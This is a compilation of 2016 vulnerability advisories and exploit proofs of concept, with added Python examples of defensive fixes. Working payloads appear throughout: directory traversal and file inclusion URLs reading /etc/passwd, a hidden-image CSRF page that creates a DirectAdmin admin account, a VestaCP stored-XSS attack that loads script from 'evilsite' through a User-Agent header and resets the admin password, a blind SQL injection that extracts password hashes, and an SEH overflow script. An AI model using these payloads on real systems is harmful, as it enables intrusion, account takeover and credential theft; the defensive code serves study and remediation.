Vulnerable Parameter(s):
[+] path
Affected Module(s):
[+] Index File Dir Listing (http://localhost:8080/)
Proof of Concept (PoC):
=======================
1.1
The local file include web vulnerability can be exploited by remote attackers with wifi panel access and without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC: Payload
http://localhost:8080/toolkit/index.html./[LOCAL FILE INCLUDE VULNERABILITY!]
PoC: Vulnerable Source
javascript:changePath("./[LOCAL FILE INCLUDE VULNERABILITY!]");
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://localhost:8080/toolkit/upload?path= Load Flags[LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[162] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0]
Accept[*/*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost:8080/toolkit/index.html]
Content-Length[819]
Content-Type[multipart/form-data; boundary=---------------------------29343138867419]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------29343138867419
Content-Disposition: form-data; name="path"
-----------------------------29343138867419
Content-Disposition: form-data; name="upload1"; filename="./[LOCAL FILE INCLUDE VULNERABILITY!]"
Content-Type: image/png
-
Status: 200[OK]
GET http://localhost:8080/toolkit/index.html Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[4995] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Connection[keep-alive]
Cache-Control[max-age=0]
Response Header:
Accept-Ranges[bytes]
Content-Length[4995]
Date[Mon, 22 Feb 2016 08:33:04 GMT]
Reference(s):
http://localhost:8080/toolkit/upload
http://localhost:8080/toolkit/index.html
1.2
The directory traversal web vulnerability can be exploited by remote attackers with wifi panel access and without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC: Payload
http://localhost:8080/listFiles?path=./.././../../../../../../../../../../
PoC: Vulnerable Source
<p></p>
<div id="list-file"><a href="javascript:changePath("/.././../../../../../../../../../../etc/%00");">
<div class="folder"><img><iframe></div></a></iframe></div></a></div>
</div>
Status: 200[OK]
POST http://localhost:8080/listFiles?path=/ Load Flags[LOAD_BACKGROUND VALIDATE_ALWAYS LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[162] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0]
Accept[*/*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost:8080/toolkit/index.html]
Connection[keep-alive]
Content-Length[0]
Response Header:
Accept-Ranges[bytes]
Content-Length[162]
Date[Mon, 22 Feb 2016 08:09:34 GMT]
-
Status: 200[OK]
POST http://localhost:8080/listFiles?path=/.././../../../../../../../../../../etc/%00 Load Flags[LOAD_BACKGROUND LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[2] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0]
Accept[*/*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost:8080/toolkit/index.html]
Connection[keep-alive]
Content-Length[0]
Response Header:
Accept-Ranges[bytes]
Content-Length[2]
Date[Mon, 22 Feb 2016 08:09:37 GMT]
-
Status: 200[OK]
POST http://localhost:8080/listFiles?path=./.././../../../../../../../../../../ Load Flags[LOAD_BACKGROUND LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[2] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0]
Accept[*/*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost:8080/toolkit/index.html]
Connection[keep-alive]
Content-Length[0]
Response Header:
Accept-Ranges[bytes]
Content-Length[2]
Date[Mon, 22 Feb 2016 08:09:45 GMT]
Reference(s):
http://localhost:8080/listFiles
Security Risk:
==============
1.1
The security risk of the local file include web vulnerability in the upload POST method request is estimated as high. (CVSS 6.7)
1.2
The security risk of the directory traversal web vulnerability in the list path GET method request is estimated as high. (CVSS 7.0)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (research@vulnerability-lab.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
Title: SOLIDserver <=5.0.4 - Local File Inclusion Vulnerability
Author: Saeed reza Zamanian [penetrationtest @ Linkedin]
Product: SOLIDserver
Tested Version: 5.0.4 and 4.0.2
Vendor: efficient IP http://www.efficientip.com
Google Dork: SOLIDserver login
Date: 17 Feb 2016
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
About Product :
---------------
EfficientIP's IP Address Management (IPAM) solution adapts to business and IT goals and objectives by allowing the creation of specific IPAM and VLANs deployment processes.
SOLIDserver™ IPAM is a unified solution that allows you to design, deploy, and manage the IP addressing plan automatically applying allocation rules and simplifying deployments.
Vulnerability Details:
----------------------
A code review of the product shows that some parameters are not validated, which allows an attacker to read file contents.
PoC 1:
-----
https://www.site.com/mod/system/report_download.php?report_filename=/etc/passwd
or
view-source:https://www.site.com/mod/system/report_download.php?report_filename=../../../../../../../../../../../../etc/passwd
PoC 2 : [login authentication required]
------
https://www.site.com/mod/generic/download_config_file.php?config_file=../../../../../../../../../../../../../../etc/hosts
#EOF
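The InstantCoder `listFiles` `path` and upload `filename` issues above and the SOLIDserver `report_filename` / `config_file` parameters share one root cause: a client-supplied path reaches the file system without being confined to the directory the handler is meant to serve. The following is an added example, not code from either vendor or either advisory author, of how a handler can confine such a path. The root directory `/srv/app/files` and the function names are assumptions; the payload list is quoted from the two advisories and is used only as constructed test input.

```python
import os
import posixpath
from urllib.parse import unquote


class UnsafePathError(ValueError):
    """Raised when a client-supplied path would escape the served directory."""


def resolve_under_root(root, requested):
    """Map a client-supplied path onto a file under ``root`` or raise UnsafePathError.

    ``requested`` is the raw query-string or multipart value, possibly still
    URL-encoded. The function decodes it, rejects NUL bytes, normalises
    '.' and '..' segments lexically, and finally confirms (after symlink
    resolution) that the result still lies under ``root``.
    """
    decoded = unquote(requested)                 # '%00' and '%2e%2e' become visible
    if "\x00" in decoded:
        raise UnsafePathError("NUL byte in path")
    # Absolute client paths are interpreted relative to root: '/etc/passwd' -> 'etc/passwd'.
    relative = decoded.lstrip("/")
    normalised = posixpath.normpath(relative)    # collapses './', 'a/../b', '//'
    if normalised == ".":
        normalised = ""
    # A leading '..' that survives normalisation means the client tried to climb above root.
    if normalised == ".." or normalised.startswith("../"):
        raise UnsafePathError("path escapes root")
    abs_root = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(abs_root, normalised))
    # Final guard: also catches symlinks inside root that point outside it.
    if candidate != abs_root and not candidate.startswith(abs_root + os.sep):
        raise UnsafePathError("path escapes root")
    return candidate


def is_safe(root, requested):
    """Verdict-only wrapper for callers such as a listFiles or download handler."""
    try:
        resolve_under_root(root, requested)
    except UnsafePathError:
        return False
    return True


def safe_upload_name(filename):
    """Reduce a multipart ``filename`` to a bare name; directory parts are never honoured."""
    name = posixpath.basename(unquote(filename).replace("\\", "/"))
    if not name or name in (".", "..") or "\x00" in name:
        raise UnsafePathError("unusable upload filename")
    return name


# Payloads quoted from the two advisories above (constructed test inputs, no live target).
ADVISORY_PAYLOADS = [
    "./.././../../../../../../../../../../",
    "/.././../../../../../../../../../../etc/%00",
    "/etc/passwd",
    "../../../../../../../../../../../../etc/passwd",
]

if __name__ == "__main__":
    for p in ADVISORY_PAYLOADS:
        verdict = "allowed (confined under root)" if is_safe("/srv/app/files", p) else "REJECTED"
        print(f"{p!r:60} -> {verdict}")
```

Note that `/etc/passwd` is not rejected but re-rooted: the handler serves `/srv/app/files/etc/passwd` if it exists, never the system file. The lexical `..` check and the post-`realpath` prefix check are both kept on purpose; the first gives a clear error before any file-system access, the second is what actually stops a symlink planted inside the served tree.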
Source: https://code.google.com/p/google-security-research/issues/detail?id=633
The attached flv file causes stack corruption when loaded into Flash. To use the PoC, load LoadMP42.swf?file=lownull.flv from a remote server.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39466.zip
=============================================================================
# Title : DirectAdmin (1.491) CSRF Vulnerability
# Date : 27-10-2014 updated 18-02-2016
# Version : >=1.491
# Author : Necmettin COSKUN =>@babayarisi
# Blog :http://ha.cker.io
# Vendor : http://www.directadmin.com/
# Download: http://www.directadmin.com/demo.html
=============================================================================
# info : DirectAdmin is a web-based hosting control panel.
# As you can see, the original form does not include CSRF protection or any secret token.
<form name=reseller action="CMD_ACCOUNT_ADMIN" method="post" onSubmit="return formOK()">
<input type=hidden name=action value=create>
<tr><td class=list>Username:</td><td class=list><input type=text name=username maxlength=12 onChange="checkName()"></td></tr>
<tr><td class=list>E-Mail:</td><td class=list><input type=text name=email onChange="checkEmail()"></td></tr>
<tr><td class=list>Enter Password:</td><td class=list><input type=password name=passwd> <input type=button value="Random" onClick="randomPass()"></td></tr>
<tr><td class=list>Re-Enter Password:</td><td class=list><input type=password name=passwd2 onChange="checkPass()"></td></tr>
<tr><td class=list>Send Email Notification:</td><td class=list><input type=checkbox value="yes" name=notify checked> <a href="javascript:showAdminMessage();">Edit Admin Message</a></td></tr>
<tr><td td class=listtitle colspan=3 align=right>
<input type=submit value="Submit">
</td></tr>
</form>
#POC
<html>
<head>
<title>POC</title>
</head>
<script language="javascript">
function yurudi(){
var adress ="www.demo.com";
var username="demo";
var email ="demo@demo.com";
var password="12345";
var urlson="https://"+adress+":2222/CMD_ACCOUNT_ADMIN?action=create&username="+username+"&email="+email+"&passwd="+password+"&passwd2="+password;
document.getElementById("resim").src=urlson;
}
</script>
<body onload="yurudi()">
<img id="resim" src="" style="height:0px;width:0px;"></img>
</body>
</html>
#POC
# don't be evil!
Discovered by:
================
Necmettin COSKUN |GrisapkaGuvenlikGrubu|4ewa2getha!
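The control the advisory says is missing is a secret token, tied to the administrator's session, that the server checks before acting on CMD_ACCOUNT_ADMIN. The following is an added example, not DirectAdmin's code, of the synchronizer-token pattern in Python: tokens are HMACs over the session id and an issue time, and a hypothetical handler accepts the create action only over POST and only with a token that verifies for the requesting session. The function names, the `csrf_token` field and the form-field checks are assumptions.

```python
import hashlib
import hmac
import secrets
import time

# Server-side secret; generated at start-up here, loaded from protected config in practice.
SECRET_KEY = secrets.token_bytes(32)
TOKEN_MAX_AGE = 3600  # seconds a token stays valid


def _mac(session_id, issued_at):
    msg = f"{session_id}:{issued_at}".encode()
    return hmac.new(SECRET_KEY, msg, hashlib.sha256).hexdigest()


def issue_csrf_token(session_id, issued_at=None):
    """Return '<timestamp>.<hmac>' bound to the caller's session cookie value."""
    issued_at = int(time.time()) if issued_at is None else int(issued_at)
    return f"{issued_at}.{_mac(session_id, issued_at)}"


def verify_csrf_token(session_id, token, now=None):
    """True only if the token was minted for this session and has not expired."""
    now = int(time.time()) if now is None else int(now)
    try:
        ts_str, mac = token.split(".", 1)
        issued_at = int(ts_str)
    except (AttributeError, ValueError):
        return False
    if issued_at > now or now - issued_at > TOKEN_MAX_AGE:
        return False
    # compare_digest keeps the comparison constant-time.
    return hmac.compare_digest(_mac(session_id, issued_at), mac)


def handle_account_create(method, session_id, form, now=None):
    """Hypothetical handler for a CMD_ACCOUNT_ADMIN-style 'create' action.

    Returns (http_status, message). State changes are accepted only over POST
    and only with a token that verifies against the requesting session, so the
    image-tag GET from the PoC above is refused on both counts.
    """
    if method != "POST":
        return 405, "state-changing actions must be POSTed"
    if not verify_csrf_token(session_id, form.get("csrf_token", ""), now=now):
        return 403, "missing or invalid CSRF token"
    if form.get("action") != "create" or not form.get("username"):
        return 400, "bad request"
    if form.get("passwd") != form.get("passwd2"):
        return 400, "passwords do not match"
    return 200, f"account {form['username']} created"


if __name__ == "__main__":
    sid = "session-cookie-value"
    tok = issue_csrf_token(sid)
    # The forged cross-site request has no token (and arrives as a GET):
    print(handle_account_create("GET", sid, {"action": "create", "username": "demo"}))
    # The legitimate form submission carries the token that was rendered into the page:
    print(handle_account_create("POST", sid, {"action": "create", "username": "demo",
                                              "passwd": "x", "passwd2": "x",
                                              "csrf_token": tok}))
```

The token is rendered into the real form as a hidden field; a cross-origin page cannot read it because the same-origin policy prevents it from reading the response, and a token for another session fails the HMAC check even if leaked.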
# Exploit Title :Vesta Control Panel <= 0.9.8-15 - Persistent XSS Vulnerability
# Vendor Homepage :http://www.vestacp.com
# Version :0.9.8-15
# Exploit Author :Necmettin COSKUN @babayarisi
# Blog :http://ha.cker.io
# Discovery date :16/02/2016
# Tested on :Fedora23 - Chrome/Firefox/Maxthon
The User-Agent header can be used to attack the website as follows.
First we change our User-Agent to include some dangerous JavaScript code (XSS etc.),
then we request one of the websites on the target server; the server saves the request, including the User-Agent, in access.log,
so when the administrator reads the log, the JavaScript code we added to our User-Agent runs.
Poc Exploit
================
1. Prepare the evil JS file
function csrfWithToken(url,hanimisToken,password){
    $.get(url, function(gelen) {
        $('body').append($(gelen));
        $('form[id="vstobjects"]').css("display","none");
        var token = $(hanimisToken).attr("token");
        $('form[id="vstobjects"]').attr("action",url);
        $('input[name="v_password"]').val(password);
        $('form[id="vstobjects"]').submit();
    });
};
//password = 1234567
csrfWithToken("/edit/user/?user=admin","#token","123456");
2. Make a GET request with the evil User-Agent to the victim server
wget --header="Accept: text/html" --user-agent="<script src='http://evilsite/evil.js'></script>" http://victimserver
3. Wait for the administrator to read the access.log into which our evil.js has been injected
4. Log in to VestaCP with the password we changed
http(s)://victim:8083/
Discovered by:
================
Necmettin COSKUN |GrisapkaGuvenlikGrubu|4ewa2getha!
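The defect behind this advisory is that raw access.log fields are written into the administrator's page as markup, so anything an anonymous client puts in its User-Agent becomes live HTML. The following is an added example, not VestaCP's code, that parses combined-format log lines and shows the unescaped rendering beside the entity-encoded one. The log lines are constructed, the second of them carrying the User-Agent from step 2 above, and the function names are assumptions.

```python
import html
import re

# Combined log format: host ident user [time] "request" status size "referer" "user-agent".
_COMBINED = re.compile(
    r'^(?P<host>\S+) (?P<ident>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<user_agent>[^"]*)"$'
)

# Constructed sample lines; the second carries the User-Agent payload from the advisory above.
SAMPLE_LOG = """\
203.0.113.5 - - [16/Feb/2016:10:21:33 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"
198.51.100.7 - - [16/Feb/2016:10:22:01 +0000] "GET / HTTP/1.1" 200 612 "-" "<script src='http://evilsite/evil.js'></script>"
"""


def parse_combined(line):
    """Return the named fields of one access-log line, or None if it does not match."""
    m = _COMBINED.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def render_row_unsafe(entry):
    """The bug: log fields dropped straight into markup; attacker text becomes live HTML."""
    return "<tr><td>{host}</td><td>{request}</td><td>{user_agent}</td></tr>".format(**entry)


def render_row_safe(entry):
    """The fix: every untrusted field is entity-encoded, so '<' and quotes stay literal."""
    cells = (html.escape(entry[k], quote=True) for k in ("host", "request", "user_agent"))
    return "<tr>" + "".join(f"<td>{c}</td>" for c in cells) + "</tr>"


def render_log_table(text, renderer=render_row_safe):
    """Render every parseable line of ``text`` as one table row."""
    rows = [renderer(e) for e in map(parse_combined, text.splitlines()) if e]
    return "<table>" + "".join(rows) + "</table>"


def contains_live_script(fragment):
    """Detection helper: does the rendered HTML still contain an unescaped <script tag?"""
    return re.search(r"<script\b", fragment, re.IGNORECASE) is not None


if __name__ == "__main__":
    print(render_log_table(SAMPLE_LOG, renderer=render_row_unsafe))
    print(render_log_table(SAMPLE_LOG))
```

Escaping at the point of output is the durable fix because the log file itself must keep the raw value for forensics; a Content-Security-Policy that disallows remote script would additionally have blocked the `src='http://evilsite/evil.js'` load even on the unescaped page.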
Source: https://code.google.com/p/google-security-research/issues/detail?id=609
The attached fuzz test case causes a crash due to a heap overflow in BitmapData.drawWithQuality.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39467.zip
# Exploit Title: Tiny Tiny RSS Blind SQL Injection
# Date: 15-02-2016
# Software Link: http://tt-rss.org/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
1. Description
$item_id inside process_category_order() is not properly escaped.
We control this value using $_POST['payload'].
http://security.szurek.pl/tiny-tiny-rss-blind-sql-injection.html
2. Proof of Concept
Login as regular user.
<form method="post" action="http://tiny-tiny-rss/backend.php">
<input type="hidden" name="op" value="pref-feeds">
<input type="hidden" name="method" value="savefeedorder">
<textarea name="payload">{"items":[{"items":{"_reference":"CAT:1' AND order_id = (SELECT IF(substr(pwd_hash,1,1) = CHAR(77), SLEEP(5), 0) FROM ttrss_users WHERE id = 1) AND -- "},"id":"root"}]}</textarea>
<input type="submit" value="Hack!">
</form>
3. Solution:
Update to version a5556c2471973e292dce615fe0c77fdbbc54405b
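The defect is that `$item_id`, taken from the `_reference` value in the posted JSON, reaches the SQL text unescaped. The following is an added Python example, not tt-rss's code, contrasting that string-building pattern with a validated, parameterised statement on an in-memory SQLite table. The table layout, the function names and the tautology payload are assumptions; SQLite has no SLEEP(), so the advisory's time-based probe is not reproduced, and the example instead shows that quote-breaking text changes which rows the statement touches.

```python
import sqlite3


def make_db():
    """In-memory stand-in for a category table (constructed; not tt-rss's real schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ttrss_feed_categories "
                 "(id INTEGER PRIMARY KEY, title TEXT, order_id INTEGER)")
    conn.executemany("INSERT INTO ttrss_feed_categories VALUES (?, ?, ?)",
                     [(1, "News", 0), (2, "Blogs", 1), (3, "Security", 2)])
    conn.commit()
    return conn


def parse_reference(reference):
    """Split the client-supplied '_reference' value ('CAT:1') into (kind, item_id) strings."""
    kind, _, item_id = reference.partition(":")
    return kind, item_id


def set_category_order_vulnerable(conn, item_id, order_id):
    """Pattern behind the advisory: item_id is pasted into the SQL text unescaped."""
    sql = (f"UPDATE ttrss_feed_categories SET order_id = {int(order_id)} "
           f"WHERE id = '{item_id}'")
    cur = conn.execute(sql)
    conn.commit()
    return cur.rowcount          # how many rows the attacker-shaped WHERE clause matched


def set_category_order_fixed(conn, item_id, order_id):
    """Fix: type-check the id, then bind it as a parameter so it can only ever be data."""
    if not isinstance(item_id, str) or not item_id.isdigit():
        raise ValueError(f"category id must be numeric, got {item_id!r}")
    cur = conn.execute("UPDATE ttrss_feed_categories SET order_id = ? WHERE id = ?",
                       (int(order_id), int(item_id)))
    conn.commit()
    return cur.rowcount


def orders(conn):
    """Current (id -> order_id) mapping, for inspecting what an update changed."""
    return dict(conn.execute("SELECT id, order_id FROM ttrss_feed_categories ORDER BY id"))


# Constructed payload: a tautology that makes the WHERE clause match every row.
INJECTED_REFERENCE = "CAT:1' OR '1'='1"


def demo():
    """Rows touched by (vulnerable, fixed) for the same injected input."""
    _, item_id = parse_reference(INJECTED_REFERENCE)
    vuln = set_category_order_vulnerable(make_db(), item_id, 9)
    try:
        fixed = set_category_order_fixed(make_db(), item_id, 9)
    except ValueError:
        fixed = 0                # rejected before any SQL was built
    return vuln, fixed


if __name__ == "__main__":
    print("rows touched (vulnerable, fixed):", demo())
```

The numeric check is not what makes the fixed version safe; the bound parameter is. The check is there because an id that is not an integer is a malformed request worth logging in its own right, which is also the cheapest detection signal for probes like the one in the PoC.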
#-*- coding: utf-8 -*-
#
# Exploit Title: Network Scanner Version 4.0.0.0 SEH Crash POC
# POC Dork: N/A
# Date: 2016-02-15
# Author: INSECT.B
# Twitter : @INSECT.B
# Facebook : https://www.facebook.com/B.INSECT00
# Blog : http://binsect00.tistory.com
# Vendor Homepage: http://www.mitec.cz/
# Software Link: http://www.mitec.cz/Downloads/NetScan.zip
# Version: 4.0.0.0
# Tested on: Windows7 Professional SP1 En x86
# CVE : N/A
'''
[+] Type : SEH
[-] Insert the string generated by running this file into the 'Detect IP from Host name...' field on the [TOOLS] tab
[-] string : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAÌÌÌÌBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
[-] crash info
(2d0.878): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=42424242 edx=772571cd esi=00000000 edi=00000000
eip=42424242 esp=0012edd8 ebp=0012edf8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246
42424242 ?? ???
0:000> !exchain
0012edec: ntdll!ExecuteHandler2+3a (772571cd)
0012f534: 42424242
Invalid exception stack at cccccccc
0:000> d 12f534
0012f534 cc cc cc cc 42 42 42 42-43 43 43 43 43 43 43 43 ....BBBBCCCCCCCC
0012f544 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
0012f554 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
0012f564 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
0012f574 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
0012f584 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
0012f594 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
0012f5a4 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
0:000> d
0012f5b4 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
0012f5c4 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
0012f5d4 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
0012f5e4 43 43 43 00 95 b4 31 74-84 f6 12 00 00 00 00 00 CCC...1t........
0012f5f4 0a 80 00 00 ea 01 24 00-00 00 00 00 00 00 00 00 ......$.........
0012f604 ab 00 0a e7 34 f6 12 00-e7 c4 06 77 ea 01 24 00 ....4......w..$.
0012f614 15 02 00 00 00 00 00 00-00 00 00 00 15 02 00 00 ................
0012f624 cd ab ba dc 00 00 00 00-84 f6 12 00 15 02 00 00 ................
'''
import struct
junk1 = "A" * 76
nSEH = "\xcc\xcc\xcc\xcc"
SEH = "BBBB"
shell = "C" * 300
payload = junk1 + nSEH + SEH + shell
with open("netEx.txt","wb") as f :
    f.write(payload)
print payload
"""
Exploit problem
1. Bytes of the input string (value) were replaced by 0x3f in memory, so the shellcode would have to be encoded with alpha_mixed.
The buffer size was 171 bytes, but the encoded shellcode size was over 600 bytes.
2. A null byte cannot be inserted into the input field, so we can't use an SEH pointer in the NetScanner.exe address range (0x00400000~0x008c3000).
3. The payload consisted of 'junk - shellcode - nSEH ptr - SEH ptr', but this step failed because the junk buffer size was only 76 bytes.
The shellcode can't be inserted.
"""